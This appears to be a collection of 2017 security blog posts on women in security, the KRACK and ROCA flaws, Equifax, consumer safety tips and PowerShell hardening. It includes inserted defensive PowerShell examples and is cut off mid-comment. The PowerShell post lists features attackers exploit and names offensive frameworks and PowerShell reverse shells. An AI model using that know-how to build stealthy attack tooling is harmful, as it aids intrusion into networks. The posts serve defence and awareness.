    So, why aren’t there more women in security and what’s keeping those of us who are from excelling? While there is no single answer, part of this can be traced back to a trend that became prominent in 80s pop culture, when computers became labeled as something only ‘nerdy’ guys should enjoy—think Revenge of the Nerds, or the more modern-day IT Crowd—where male leads are portrayed as socially awkward and computer-obsessed.

    Source: Pinterest

    In addition, personal computers became a household norm. According to an NPR article entitled “When Women Stopped Coding,” this trend was seen in many more homes with male children than in those with female children. Therefore, the sheer lack of exposure to computers, again, diverted a lot of young women away from an interest in tech. Many more boys grew up with the opportunity to excel in coding, security, and other computer-related disciplines, not only from an early age, but from home—setting a nearly impossible bar for young women to reach.

    As far as the workforce is concerned, tech has quite an unfortunate retention rate for women as well, as many women end up switching careers after some time in a technical role. Personally, before I even took my first security course in undergrad, I was warned by another woman in the field that I would need “a very thick skin” to succeed. She was absolutely correct and this is something I learned quickly on my own, as well. This is not okay and it should absolutely not be the standard.

    Furthermore, according to the ISC2 report, 51 percent of women have experienced discrimination within the field, with only 15 percent of men reporting the same. According to these reports, this also happens even more frequently as women excel in their careers. In addition, while unemployment rates in tech are lower than many other fields, according to Dice, for women it’s the opposite. And with other issues such as pay inequity and gender discrimination, women face a very steep uphill battle if they truly want a future in this field.



    In modern day Silicon Valley, a few women have been willing to speak out against these injustices: women like Ellen Pao, famous for her gender discrimination lawsuit, and Susan Fowler, known for her blog post on the toxic working culture for women in tech. However, despite this, little has changed.

    Back to security: with the big push for women to learn how to code at female-focused coding camps like Hackbright and Girls Who Code, the number of female software developers is on the rise. In fact, according to the US Bureau of Labor Statistics, 20 percent of software/web developers are female. However, this same push is not reflected in security, as the aforementioned statistic shows, with only 11 percent of InfoSec professionals being women. This also rings true at events and meetups focused on women in tech. Other women have looked at me strangely and become a bit cliquey in these situations, once I’ve shared that I work in security and not software development. Because of this, women in security can still feel left out, even in a room full of female tech professionals.

    This is very problematic because of the increasing demand for workers with cybersecurity skills. A major lack of women in the field therefore results in fewer people to fill these much-needed positions. On top of that, women should be encouraging other women in tech, regardless of their specific discipline.

    According to a study from the “Center for Cyber Safety and Education”, there is a projected gap of 1.8 million unfilled cybersecurity jobs by 2022. A push for women to enter the security workforce would not only aid in closing this, but businesses with a more even distribution of men and women have seen up to a 41 percent increase in revenue. And companies with at least three female directors have seen over a 66 percent increase in invested capital. Workplaces with more gender diversity also see higher customer satisfaction, productivity, and profitability.



    So, how do we change this? I think the first thing that needs to be considered is a strong outreach to young girls. This is not only critical, but needs to begin very early at the elementary level. According to a survey conducted by Microsoft, girls lose interest in STEM when they hit their early teenage years. In addition, 60 percent of them report that they are intimidated by the tech field because of the unequal numbers and stereotypes.

    1. Get engaged at a young age – and stay engaged. It’s important to inspire girls at a young age with hands-on workshops, camps, and other experiences. While coding camps are fantastic, a rise in security camps needs to happen, as well. We need to encourage our young girls who are excited about logic and problem solving to recognize how they can one day make a career out of it. And finally, it needs to be fun. We need to inspire young girls to excel in tech in the same way we do with young boys. The Girl Scouts of America, with their superstar rocket scientist CEO, have teamed up with Palo Alto Networks, and are making strides in the right direction. In 2018, the Girl Scouts will begin offering a range of cybersecurity badges. Hopefully other organizations will begin to follow this example.


    2. Powerful role models. Another change that needs to happen, is for girls to become less intimidated by the industry itself. Personally, I was always interested in tech, but also terrified by the idea of entering such a male-dominated field. This is enough to dissuade many women from even giving it a chance. A focus on powerful female role models within tech and security is paramount. I’d love to see more lists like this:


    3. Keep up progress where it exists. On a positive note, according to the ISC2 report, millennials may have a chance to change this downward trend due to an increased number of women entering computer science and engineering degree programs. This increase is likely due to the focus on technology, which has occurred within our lifetime. In fact, just last year, more women graduated with engineering degrees than men at Dartmouth, and several other universities are working to follow suit. Last year, the Oracle Academy also pledged $3M and began the international Let Girls Learn initiative with the White House in order to help expose more young girls to STEM.


    Encouragement early on is key, as girls lose interest in tech at a very young age. Inspiring them to embrace their abilities and to recognize the opportunities at hand is an excellent start. Work needs to be put in by people across many industries—whether it’s security, education, or community organizations—in order to become a driving force to not only embrace women within the field, but to close a very serious, impending employment gap within it, as well. Negative stereotypes about tech need to become a thing of the past, and positive female role models need to be lifted up and exemplified. Without any of this, the cybersecurity industry is going to continue to lack diversity, and soon flounder, as demand increases but our standards continue to live in the past.

    Trust vs Access: A Tale of Two Vulnerability Classes Fri, 20 Oct 2017 15:32:55 +0000 It’s been a big week in cyberspace, with the high-profile crypto vulnerabilities KRACK (affecting WPA2) and ROCA (affecting RSA keys generated by Infineon hardware) hitting the news. Not only were these mammoth bugs released, but a new Adobe Flash 0-day exploit was observed in the wild being used to install the FinSpy commercial malware, and finally, the DDE feature in Microsoft Office was found to be open to abuse to gain code execution. There has been a great deal of discussion on Twitter and elsewhere on the comparative severity of the different vulnerabilities and, in particular, on how the crypto bugs were not as severe as initially thought.



    I think the vulnerabilities are all interesting in their own way and it’s helpful to delineate the differences between them. Both crypto bugs represent an attack on trust, that is, they undermine the trust that people and organizations have in security systems to protect them. WPA2 is used almost exclusively to secure WiFi networks around the globe, and the consequences of a loss of trust in the protocol are severe. Many organizations will launch vast programs to ensure that they’re protected, equipment will be ripped and replaced, and countless meetings will be held on the topic. This is happening even though the risk, as it stands today, is low: only limited proof-of-concept code is available, and Microsoft Windows is relatively unaffected. In addition, requiring physical access also raises the bar to a successful attack. The perception, however, is that WPA2 is imperiled.

    Figure 1 – KRACK attack logo

    A similar story exists for the ROCA vulnerability. Infineon products are used in many different types of crypto equipment: software signing, Trusted Platform Modules (TPM), identity documents, certain authentication tokens, etc. For each RSA key of 1024 or 2048 bit length that has been generated by a piece of hardware, it must first be established whether a vulnerable Infineon chip was used to generate the key; secondly, one of the various tools must be used to verify that the key is not easily factorized due to the key generation vulnerability. Due to the prevalence of the vulnerable chips and the diversity of the equipment they are used in, this verification process will be costly both in terms of money and time.


    Figure 2 – ROCA impact diagram
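    What the "verify that the key is not easily factorized" step looks like in practice, as an added example that is not code from the original post or from the ROCA researchers' own tooling: the published fingerprint test rests on the fact that primes produced by the affected library have the form p = k*M + (65537^a mod M), with M a primorial, so the modulus N = p*q leaves a residue modulo every odd prime of M that lies in the subgroup generated by 65537. The prime list, the generator and the structure below follow that public description; the two sample moduli are constructed for the demonstration and are not real keys.

```powershell
# Added example (not code from the original post or from the ROCA researchers):
# a re-implementation of the published ROCA fingerprint test in PowerShell 5.
# Weak primes have the form  p = k*M + (65537^a mod M), so for N = p*q the residue
# N mod r lies in the subgroup generated by 65537 for every odd prime r dividing M.
# The primorials used for larger keys contain the 512-bit one, so the odd primes up
# to 167 are enough to test 1024- and 2048-bit moduli as well.

$RocaPrimes = 3,5,7,11,13,17,19,23,29,31,37,41,43,47,53,59,61,67,71,73,
              79,83,89,97,101,103,107,109,113,127,131,137,139,149,151,157,163,167

function Test-RocaFingerprint {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][bigint]$Modulus   # RSA public modulus N
    )
    foreach ($r in $RocaPrimes) {
        # Enumerate <65537> mod r: the residues 65537^0, 65537^1, ... until they repeat.
        $subgroup = @{}
        $x = 1
        while (-not $subgroup.ContainsKey($x)) {
            $subgroup[$x] = $true
            $x = ($x * 65537) % $r          # 166 * 65537 still fits comfortably in Int32
        }
        if (-not $subgroup.ContainsKey([int]($Modulus % $r))) {
            return $false   # one residue outside the subgroup rules the weak generator out
        }
    }
    return $true            # every residue is consistent with the weak generator
}

function ConvertTo-Modulus {
    # Converts the big-endian modulus bytes that RSA.ExportParameters($false).Modulus
    # returns (e.g. from a certificate's public key) into a positive [bigint].
    param([Parameter(Mandatory)][byte[]]$BigEndianBytes)
    $little = [byte[]]$BigEndianBytes.Clone()
    [array]::Reverse($little)
    return [bigint]::new([byte[]]($little + [byte]0))   # trailing 0x00 keeps the sign positive
}

# --- constructed demonstration values, not real keys ---
$M = [bigint]1
foreach ($r in $RocaPrimes) { $M = $M * $r }

# A modulus built to have the weak structure: N = c*M + (65537^a mod M).
$rocaShaped = $M * [bigint]::Parse('987654321987654321987654321') +
              [bigint]::ModPow([bigint]65537, [bigint]12345, $M)

# A toy modulus from two ordinary primes (101 * 103); 10403 mod 11 = 8, which is not in {1, 10}.
$ordinary = [bigint]10403

[pscustomobject]@{ Sample = 'constructed ROCA-shaped'; Fingerprint = Test-RocaFingerprint $rocaShaped }
[pscustomobject]@{ Sample = 'ordinary toy modulus';    Fingerprint = Test-RocaFingerprint $ordinary }
```

    To test a real certificate, take the modulus bytes from its public key (for an RSA certificate in the local store, `$cert.PublicKey.Key.ExportParameters($false).Modulus`), pass them through ConvertTo-Modulus and then to Test-RocaFingerprint. A positive result means the key was produced by the affected generator, not that it has been factored; a negative result for any of the primes is conclusive. For anything beyond illustration, use the maintained detection tools, which also handle PGP, SSH and TPM key formats.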


    This week Kaspersky Lab released a report on the usage of an Adobe Flash 0-day against Middle Eastern targets by the Black Oasis APT actor. The detection of the exploit resulted in Adobe issuing an out-of-band critical patch and the Chrome browser blocking the usage of vulnerable versions of Flash. The exploit was part of an attack that delivered the FinSpy commercial malware to selected targets, most likely for espionage purposes. While this attack demonstrates once again the validity of Adobe’s decision to retire Flash in 2020 and the importance of removing Flash entirely or enforcing click-to-play and mandatory patching, now that this attack has been burned, the immediate danger has passed for many users. Anti-virus definitions have been updated, patches issued and many, but obviously not all, endpoints are now protected against this attack. The real danger of such exploits is that, once they’ve been found in the wild, they often find their way into exploit kits and other attack toolkits which are used against unpatched systems.


    Figure 3 – Adobe security update for CVE-2017-11292

    The final big news story was the discovery by SensePost of a method of gaining remote code execution from Microsoft Office documents by abusing a legacy feature called DDE. In a method similar to VBA macros or OLE embedded objects in Microsoft Office, the DDE technique does not require exploitation of a vulnerability, but rather rests on a user clicking through a confusing prompt which permits the attacker’s payload to be executed. While SensePost contacted Microsoft concerning the issue, it was deemed that the DDE feature was working as expected and would not be immediately patched. Numerous attacks have already been observed in the wild using this technique and, so far, many defenders are struggling to keep attackers using this approach out of their networks.


    Figure 4 – Prompt separating the user from system compromise

    The crypto attacks KRACK and ROCA are very different in their impact compared to the Adobe Flash 0-day and the Microsoft Office DDE issue. The crypto attacks are attacks on trust. Organizations deploying WPA2 and RSA-based encryption have to rely on the supply chain providers performing their due diligence on the products that they provide. This applies particularly to the ROCA attack, where the full extent of the issue is still unknown. More and more products are being discovered to generate vulnerable keys, and we can expect to be checking for weak keys for a long time to come.

    The Flash 0-day and the DDE issue are ways for attackers to gain initial access to a network. Mitigations exist in the form of patching or disabling features, and once they have been applied, an organization can have a reasonable amount of confidence that it is resilient against attacks using these particular vectors. However, the uncertainty spread by attacks which undermine the systems we use for protection is more insidious: the trust we have in these systems turns out to have been misplaced.

    When assessing the impact of a vulnerability, it is worth keeping in mind what the consequences of the vulnerability are:

    • Is it a tool for providing unauthorized access to an attacker?
    • Or is it undermining the trust we have in the security systems we have built?

    In terms of response, if unauthorized access to our networks is discovered, the response can be tactical and immediate, that is, a standard incident response. The response to an attack on trust must be more long-term and strategic. It must take into account the uncertainty around the lifetime and impact of the issue; these attacks on trust may live on for years in the most unexpected places.

    Key Reinstallation Attacks (KRACK): The Impact So Far Mon, 16 Oct 2017 15:02:12 +0000 Today, a series of high-severity vulnerabilities affecting the WiFi Protected Access II (WPA2) protocol were disclosed. Security researchers have developed a proof of concept (POC) demonstration, dubbed “KRACK”, and a dedicated website through which further details are likely to be released.

    An advisory was distributed by the US CERT to a select number of unidentified organizations stating the following malicious activities could occur should an attacker successfully exploit the vulnerabilities: decryption, packet relay, TCP connection hijacking, and HTTP content injection attacks.

    Here’s what we know – and do not yet know – so far.



    It’s likely that a large number of devices which use WiFi are exposed to this vulnerability, but the attack only works if the attacker is within radio range of the victim’s network; in other words, it requires the physical presence of an attacker near the victim’s network.



    Fig 1 – A screenshot of a POC demonstration for KRACK. Source: hxxps://www[.]youtube[.]com/watch?time_continue=13&v=Oh4WURZoR98


    Researchers have demonstrated a proof of concept (POC) attack, dubbed “Krack attack”, targeting an Android smartphone; the accompanying video showed how all the data transmitted by the victim could be decrypted, including a plaintext downgrade attack against TLS/SSL via sslstrip. Details are available on a dedicated website: hxxps://www[.]krackattacks[.]com/. Linux and Android versions 6.0 and above are particularly affected, though the list of vulnerable devices is extensive.

    Some wireless manufacturers have already developed patches to mitigate against this threat, with Bleeping Computer and US CERT having published useful lists of the latest firmware and driver updates.



    While there is a proof of concept demonstration, there was no proof of concept code released, and no public indication these vulnerabilities had been exploited in the wild. Although the POC video gave a good overview of the exploit, the exact technical knowledge required to successfully conduct this type of attack is unknown.

    We have not yet observed the vulnerability exploited in the wild, although criminals have shown an interest. This is confirmed by conversations on criminal forums, with users interested in – yet skeptical of – finding a quick exploit.



    Fig 2 – Discussion of KRACK on a criminal forum


    The US CERT reiterates that the vulnerabilities could potentially be used to conduct arbitrary packet decryption and injection, TCP connection hijacking, HTTP content injection, or the replay of unicast, broadcast, and multicast frames by conducting a man-in-the-middle (MiTM) style attack. Of course, not all devices are equally affected, but the research paper outlines these differences.

    In order to manage the risk, here are five steps organizations can take:

    1. Enumerate connected devices. Use your wireless control software to enumerate all connected devices and create an inventory. The connected devices will give an indication of the risk posed. Look out for Internet of Things devices, such as printers, and any Android or embedded Linux devices.
    2. Patch your vulnerable connected devices. The first priority is, predictably, to patch vulnerable devices. More patches are expected over the next 24 hours, so monitor for updates. As mentioned earlier in the blog, Bleeping Computer and US CERT have both provided good updates on this.
    3. Adopt a second layer of security. Despite well-known issues with some VPNs, having non-wired internet users connected by VPN is a good interim measure. Adopting cryptographic protocols, such as Transport Layer Security (TLS/SSL), is another option.
    4. Consider a wired connection. Based on the extent to which your connected devices are vulnerable, consider switching to an Ethernet connection. While this might not be scalable for an enterprise campus, it is a consideration should the severity increase over the upcoming days.
    5. Stay up-to-date on the latest KRACK news. There will be more to come, so stay tuned for further updates.


    Simply Put, Effective Cybersecurity is the Strength Sum of Its Parts Wed, 11 Oct 2017 14:50:10 +0000 Today’s cybersecurity landscape, dominated as it is by professional threat actors, state sponsored attackers and hacktivists, requires a more consistent and integrated approach from governments and businesses around the world to technology vendors. Having the very best solution remains critical, but if it is isolated inside a corporate infrastructure, the bad guys will likely eventually find a way around it.

    Meaningful partnerships with an integrated technology approach bring together best of breed solutions in a manner that enterprises can greatly improve their overall security posture, reducing overall exposure and protecting investment.

    We recognize that while Digital Shadows’ SearchLight solution remains a market leader in digital risk management, solving several significant challenges for customers today, by working with market-leading technology partners we can offer our mutual customers an incrementally more effective solution to combat cybersecurity threats.

    This is why we are excited that today we announced our Digital Risk Management Technology Ecosystem featuring 11 leading security technology companies, with more expected to join in the coming months. We have spent months working diligently to locate partners who all share a vision for how security analytics and security information and event management (SIEM), product orchestration and automation, risk and compliance, intelligence and network enforcement, must work together to best protect customers from today’s digital risks.

    Our initial ecosystem members will bring their individual, industry-proven strengths to enhance Digital Shadows’ intelligence and digital risk management capabilities which extend across the widest range of data sources within the open, deep and dark web to protect customers around the world.

    Just last month we announced similar partnerships with Splunk and ServiceNow and we are convinced that these kinds of alliances and partnerships are the best way to protect our customers around the world so they can maximize and tap the huge benefits the digital economy brings.

    To learn more, read our full press release here.

    Simple Steps to Online Safety Thu, 05 Oct 2017 14:48:15 +0000 On the heels of some very high-profile and disturbing data breaches, this year’s Cyber Security Awareness Month is timely. This October comes after the announcements of major data breaches at Equifax, Deloitte and the Securities and Exchange Commission, and with the increased publicity and impact of social media, the attention and respect that cyber security, information security and data security deserve are starting to pick up steam.

    The first step in making changes is building awareness, and this blog relates to National Cyber Security Month’s Week 1 theme, ‘Simple steps to online safety’. It will help consumers understand the threats and how to protect themselves, including what to do if they become a victim of cyber-crime.

    Protecting yourself online may seem impossible, but following simple guidelines like enabling stronger authentication, strong password management, and regular update installation can do wonders to protect you from cybercrime.

    Enable Stronger Authentication

    1. Extra layers of security beyond a password are available from most email providers, social media platforms, and financial institutions. Taking advantage of this multifactor authentication helps ensure that only authorized users can access your accounts. Remember that not all MFA is made equal; MFA that relies on SMS comes with problems of its own.


    Figure 1 – An advertisement for SS7 bypass services on the dark web

    2. Install updates for apps and software on your devices as soon as they are available. Keeping software up to date will prevent cybercriminals from taking advantage of known vulnerabilities.

    3. Do not open emails, links, or attachments from strangers. Phishing attacks often use email or malicious websites or links to infect your device with malware, which can gain access to personal and financial information or accounts.

    Remain Skeptical

    1. As a consumer, stay skeptical. Unless you are dealing with a known and reputable company, those amazing deals are probably amazing frauds. Fake shopping websites are very sophisticated with professional designs often mimicking legitimate sites.


    Figure 2 – An advertisement for fraudulent goods on the dark web. Not all offers will be this obvious!

    2. The domain name is the best giveaway – look out for those that are long, with lots of hyphens, slashes, or special characters, or that include popular brands or stores but with extra letters or numbers (e.g., www[.]cheapapp1estuff[.]com).

    3. Also, the URL in the checkout section should start with https:// and have a padlock icon to the left of it indicating SSL encryption; exit immediately if it doesn’t. (Equally, remember that the presence of a padlock icon does not make the site definitely secure!) Don’t assume that links from trusted sites confer legitimacy: Facebook ads have linked to bogus Ray-Ban sites and Instagram promoted a phishing site that lured buyers with discounted Adidas and Coach merchandise.
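    The domain-name giveaways listed above can be turned into a simple scoring check. The script below is an added example, not code from the original post: the brand list, the homoglyph table and the sample URLs are all constructed for the demonstration, and the registrable-domain logic assumes a two-label suffix such as .com.

```powershell
# Added example (not code from the original post): a small scorer for the domain-name
# giveaways described above. The brand list, homoglyph table and sample URLs are
# constructed for the demonstration; tune both lists to the brands you actually protect.

$KnownBrands = @{             # brand keyword -> the legitimate registrable domain (assumed)
    'apple'  = 'apple.com'
    'adidas' = 'adidas.com'
    'rayban' = 'ray-ban.com'
}
# Characters commonly substituted for letters in lookalike names ("app1e" -> "apple")
$Homoglyphs = @{ '0' = 'o'; '1' = 'l'; '3' = 'e'; '4' = 'a'; '5' = 's'; '7' = 't'; '@' = 'a'; '$' = 's' }

function Get-DomainRisk {
    param([Parameter(Mandatory)][string]$Url)

    if ($Url -notmatch '^[a-z]+://') { $Url = "http://$Url" }   # let [uri] parse bare host names
    $hostName = ([uri]$Url).Host.ToLowerInvariant()
    $labels   = $hostName.Split('.')
    # Registrable part = last two labels (adequate for .com-style TLDs; a public-suffix
    # list would be needed for suffixes such as .co.uk)
    $registrable = ($labels | Select-Object -Last 2) -join '.'
    $label       = if ($labels.Count -ge 2) { $labels[-2] } else { $labels[0] }

    $reasons = [System.Collections.Generic.List[string]]::new()

    # 1. Brand names hidden inside the label, after undoing digit/letter swaps and hyphens
    $normalised = $label
    foreach ($k in $Homoglyphs.Keys) { $normalised = $normalised.Replace($k, $Homoglyphs[$k]) }
    $normalised = $normalised.Replace('-', '')
    foreach ($brand in $KnownBrands.Keys) {
        if ($normalised.Contains($brand) -and $registrable -ne $KnownBrands[$brand]) {
            $reasons.Add("contains '$brand' but is not $($KnownBrands[$brand])")
        }
    }

    # 2. Long labels, many hyphens, digits mixed into the name
    $hyphens = ($label -split '-').Count - 1
    if ($hyphens -ge 3)       { $reasons.Add("$hyphens hyphens in the name") }
    if ($label.Length -ge 20) { $reasons.Add("name is $($label.Length) characters long") }
    if ($label -match '\d')   { $reasons.Add('digits inside the name') }

    [pscustomobject]@{
        Url     = $Url
        Domain  = $registrable
        Score   = $reasons.Count
        Reasons = $reasons -join '; '
    }
}

# Constructed sample input: the lookalike from the text, two genuine sites, and a hyphen-heavy seller.
# Expected scores: 2, 0, 0, 4.
'www.cheapapp1estuff.com', 'https://www.apple.com/shop', 'ray-ban.com', 'adidas-shoes-outlet-sale-2017.net' |
    ForEach-Object { Get-DomainRisk $_ } | Format-Table -AutoSize
```

    The score is a prompt for a closer look rather than a verdict: legitimate regional or campaign sites do sometimes use long hyphenated names, and a lookalike that uses a homoglyph the table does not cover (or a different top-level domain with the exact brand name) will score zero here, which is why the https and padlock checks that follow still matter.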

    Do Your Research On IoT And UPNP Devices

    1. DDoS attacks are only one possible threat from infected IoT devices, and the diversity amongst IoT hardware and software makes them extremely difficult to secure. Most IoT devices are meant to be install-and-forget and were not built with patching and updating in mind, thus security maintenance is very challenging if not impossible.

    2. No one is suggesting that you strike those smart TVs or personal drones off your holiday shopping list, but it is imperative for consumers to stay informed. Do your homework – read online reviews and make sure you’re aware of any security issues. The first time you turn the device on, change default passwords and check for updates and patches. Make sure your home Wi-Fi network is secure and avoid public Wi-Fi when possible.

    Use Common-Sense

    1. When shopping online, use a credit card, not debit, to limit your losses in case of fraud. Don’t make purchases or check bank statements over public Wi-Fi, as malicious actors can intercept data, capture your web traffic, or redirect you to malware or phishing sites. If you use public Wi-Fi frequently, consider encrypting your traffic via a personal VPN connection service. Monitor your bank and credit card transactions frequently and set alerts for suspicious activity.

    All members of the public can take some simple actions to protect themselves online and to recover in the event a cyber incident occurs. Cybercriminals often prey on human error – such as people clicking on a link in a phishing email or using weak or reused passwords – to gain access to home networks and financial or social media accounts. You can’t eliminate every risk, but you can keep yourself safer while enjoying this connected world.

    Gearing Up For National Cyber Security Awareness Month Tue, 03 Oct 2017 14:34:01 +0000 I’m going to go out on a limb and say that I’m probably not the only one that’s pleased to see the back of September. The cinders of the Equifax breach continue to fall into October and, irrespective of the identities of the actors behind the breach, the impact of the 143 million exposed Social Security Numbers will have a long tail.

    National Cyber Security Month

    In light of this, it’s probably a good time to reflect on the current state of security. Which is just as well, given that we’re two days into the first week of the annual National Cyber Security Month (U.S.) and CyberSecMonth (Europe). It’s a great opportunity to look at ways to overcome the challenges we face. As a reminder, here are the weekly themes for the respective U.S. and European security awareness months.

    Date              | United States Theme                                        | European Theme
    Week 1: Oct 2-6   | Simple Steps to Online Safety                              | Cyber Security in Workplace
    Week 2: Oct 9-13  | Cybersecurity in the Workplace is Everyone’s Business      | Governance, Privacy & Data Protection
    Week 3: Oct 16-20 | Today’s Predictions for Tomorrow’s Internet                | Cyber Security in the Home
    Week 4: Oct 23-27 | The Internet Wants YOU: Consider a Career in Cybersecurity | Skills in Cyber Security
    Week 5: Oct 30-31 | Protecting Critical Infrastructure from Cyber Threats      |


    The U.S. and European themes do differ a little, but there are three common themes which apply to all organizations across the world.

    1. Increase In Connected Devices, And The Difficulty Of Managing The Risk

    Social media, mobile computing and cloud services have increased the ease and speed of communication, while simultaneously reducing the cost. The “internet of things” looks to add further complexity to this, with some forecasts claiming there will be 200 billion connected devices by 2020.

    This is tricky for organizations to manage, especially when they don’t directly control the flow of information. Employees, suppliers and other third parties are all sharing and exposing sensitive information. Keeping track of what data is shared and when it becomes exposed can cause regulatory headaches, privacy concerns and, ultimately, loss of revenue.

    2. Security Is An Issue Beyond The Security Department

    Week 2’s theme is “Cybersecurity in the Workplace is Everyone’s Business”, which ties into two main areas: building a culture of cybersecurity and security as a strategic issue.

    Building a culture of cybersecurity is something we’ve written about a good amount (here you can read our blogs on Security Culture and Resilience). This is important to ensure every individual within the organization is vigilant and feels like they can report security issues. Security isn’t something that starts and stops at the SOC.

    As Equifax’s share price is testament to, security has strategic implications and, as such, it should be strategically driven. Boards need to understand that weaknesses in an organization’s security posture can have significant strategic implications. At the same time, employees need to do a better job of communicating this risk to the board.

    3. Security Teams Are Held Back By A Skills Shortage

    In his keynote presentation at the 2017 SANS CTI Summit, Cliff Stoll recalled that he and his team had “Zero budget, zero expertise and zero mandate.” While Cliff was talking about the 1980s, these three challenges remain.

    Hiring good people and building up expertise remain some of the biggest challenges, which is why it’s great to see the focus on skills shortage. The underrepresentation of women in security is a problem that continues to plague the industry, and we’ll be digging deeper into this in Week 2.

    However, a lack of diversity extends beyond gender inequality; it includes the need to train individuals from diverse backgrounds. Having a broader range of backgrounds and skills is important in helping teams avoid falling into groupthink and other cognitive biases.

    We’ll be publishing blogs on these weekly themes, so stay tuned.

    2017 Equifax Breach: Impact and Lessons Learned Thu, 28 Sep 2017 14:24:23 +0000 Equifax experienced a data breach that occurred in mid-May 2017, was first discovered on 29 Jul 2017, and was publicly disclosed by the company on 07 Sep 2017. The breach affected 143 million individuals in the United States, Canada and the United Kingdom. Immediately after the disclosure Equifax faced widespread criticism from the media, researchers and customers. There have also been allegations of insider trading and legal implications. In our paper Equifax Breach: Lessons Learned for Your Organizations, we outline how the events surrounding the breach demonstrate several important learning points organizations can use to inform their own security posture.


    The largest immediate impact to Equifax was loss of investor confidence; the share price dropped 34 percent within eight days after the breach disclosure. The company also risks revenue loss resulting from reduced business, especially considering customers’ loss of confidence in the company to secure data. As with all data breaches, Equifax will also incur financial losses through its responsive investigations and, likely, costs resulting from lawsuits.

    Swift public criticism followed around Equifax’s security posture, its handling of the breach and the exposure of the sensitive customer data. Some employees have been accused of insider trading, and others have reportedly left their positions, such as the chief security officer and chief information officer. Reputational damage may have a mid- to long-term effect on the company’s revenue generation and a prolonged impact on its finances.

    The key lessons organizations can learn from this event are:

    • Maintain an external view of your digital footprint to be aware of what an attacker can access, what is vulnerable to attack and what methods attackers are using against your sector.
    • Establish and maintain a threat intelligence program, and act on the intelligence; Digital Shadows provided clients with multiple alerts about exploitation of the vulnerability that affected Equifax, prior to the intrusion.
    • Implement and follow general cyber-security good practice measures, such as defense in depth and vulnerability management. Plan as if an attacker will compromise your network and ensure your sensitive information will be protected.
    • Assume a breach will occur and plan for this outcome. Ensure people, processes and strategy are in place in advance of it.
    • Control knowledge of a breach to trusted individuals and prepare for announcements by analyzing the possible consequences of decisions.
    • Communicate clearly when a breach happens, stating the knowns and unknowns publicly. Speculation from media and researchers can damage reputation.
    • Look for your compromised data online, to try to discern the attacker’s motive. Understanding whether the motive was financial gain may help mitigate against prolonged malicious activity.

    Download a copy of our paper to learn more about the impact of the breach and the lessons organizations can learn at three different stages: pre-breach, post-discovery and post-disclosure.

    PowerShell Security Best Practices Wed, 27 Sep 2017 12:45:18 +0000 Threat actors have long used legitimate tools to infiltrate and move laterally across defenders’ networks. The reasons for this are clear: the likelihood of being detected is much lower when authorized tools are leveraged instead of malicious tools that might trigger prevention or detection controls. PowerShell’s attributes have also made it attractive to adversaries, and it was used most recently in the Petya/NotPetya campaign. In this blog, we will cover some PowerShell best practices that will prepare you for adversaries who will use your own PowerShell implementation against you.


    PowerShell is an automation platform and scripting language for Microsoft Windows and Windows Server, which allows you to simplify your system management. Unlike other text-based shells, PowerShell harnesses the power of Microsoft’s .NET Framework, providing rich objects and a massive set of built-in functions to take control of your Windows environments.



    PowerShell has been used heavily for cyber attacks, especially recently during the Petya/NotPetya campaigns. The most important aspect for attackers is its native integration with the .NET Framework, which offers multiple options for infecting or manipulating the target.

    PowerShell’s most attractive attributes to adversaries are:

    • Simple access to network sockets
    • Ability to assemble malicious binaries dynamically in memory
    • Direct access to the Win32 Application Programming Interface (API)
    • Simple interface with Windows Management Instrumentation (WMI)
    • Powerful scripting environment
    • Dynamic, runtime method calls
    • Easy access to crypto libraries, e.g. IPSec, hashing algorithms
    • Ability to hook managed code
    • Simple bindings to Component Object Model (COM)

    All the above render PowerShell an extremely effective attack vector.

    PowerShell was first mentioned as an attack platform in 2010, when it was presented at Def Con 18 as a proof of concept. Both a bind shell and a reverse shell programmed purely in PowerShell were demonstrated in the same context.

    There are numerous attack tools – like Nishang, PowerSploit, and the PowerShell Empire platform (www.PowerShellempire[.]com) – that offer a post-exploitation agent built on encrypted communications. These tools can be used for reconnaissance, persistence, and lateral movement, as well as other offensive techniques. Of course, given its native capabilities, PowerShell can be programmed in multiple ways, providing custom tools and techniques to remain stealthy and undetected by common security controls and countermeasures.

    Adversarial Tactics, Techniques & Common Knowledge, or ATT&CK by Mitre, which provides an extensive list of attack vectors, tactics, and techniques, describes PowerShell as a powerful interface that adversaries can use to perform a variety of actions, and provides real-world examples.


    Given that PowerShell cannot be disabled or removed from organizations that require it, the following actions are the recommended best practices to use PowerShell efficiently while preventing its use as an attack vector.

    1. PSLockDownPolicy And PowerShell Constrained Language Mode

    Constrained language mode limits the capability of PowerShell to base functionality, removing advanced feature support such as .NET and Windows API calls and COM access. This lack of advanced functionality stops most PowerShell attack tools, because they rely on these methods. However, in enterprise environments it can break legitimate scripts; it is therefore highly recommended to schedule a testing period before activating this option, to identify the legitimately used code that depends on these features.

    Enable Constrained Language Mode (machine-wide; applies to PowerShell processes started afterwards):
    [Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')

    Enable via Group Policy:
    Computer Configuration\Preferences\Windows Settings\Environment
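    The testing period and the rollout described above, as an added PowerShell example (this is not code from the original post). It assumes Windows PowerShell 5.x on Windows 10 and an elevated session for the machine-wide variable; C:\Scripts\Example.ps1 is a placeholder for one of your own scripts.

```powershell
# Added example, not from the original post: trial Constrained Language Mode
# (CLM) in a throwaway process, then apply the machine-wide lockdown variable.
# Assumes Windows PowerShell 5.x on Windows 10; the SetEnvironmentVariable call
# needs an elevated session. C:\Scripts\Example.ps1 is a placeholder path.

# 1. Trial run. A session can only move to a more restrictive language mode,
#    never back, so the probe runs in a child process. -EncodedCommand avoids
#    the quoting problems of passing multi-line text on the command line.
$probe = @'
$ExecutionContext.SessionState.LanguageMode = 'ConstrainedLanguage'
"Mode: $($ExecutionContext.SessionState.LanguageMode)"
# What attack tooling relies on and CLM refuses: arbitrary .NET types
try   { $null = New-Object System.Net.WebClient; 'WebClient: allowed' }
catch { "WebClient: blocked ($($_.FullyQualifiedErrorId))" }
# Core types keep working, so ordinary administration is unaffected
"Core types: " + [math]::Max(1, 2)
# Run one of your own scripts under CLM; an error here means the script needs
# full language mode (or a rewrite) before CLM is rolled out.
if (Test-Path 'C:\Scripts\Example.ps1') { & 'C:\Scripts\Example.ps1' }
'@
$bytes = [Text.Encoding]::Unicode.GetBytes($probe)
powershell.exe -NoProfile -EncodedCommand ([Convert]::ToBase64String($bytes))

# 2. Once legitimate scripts are accounted for, apply the lockdown machine-wide.
#    PowerShell reads __PSLockdownPolicy at engine start, so only new processes
#    are affected; 4 = ConstrainedLanguage. This is a convenience setting, not
#    a security boundary: any account that can edit machine-wide environment
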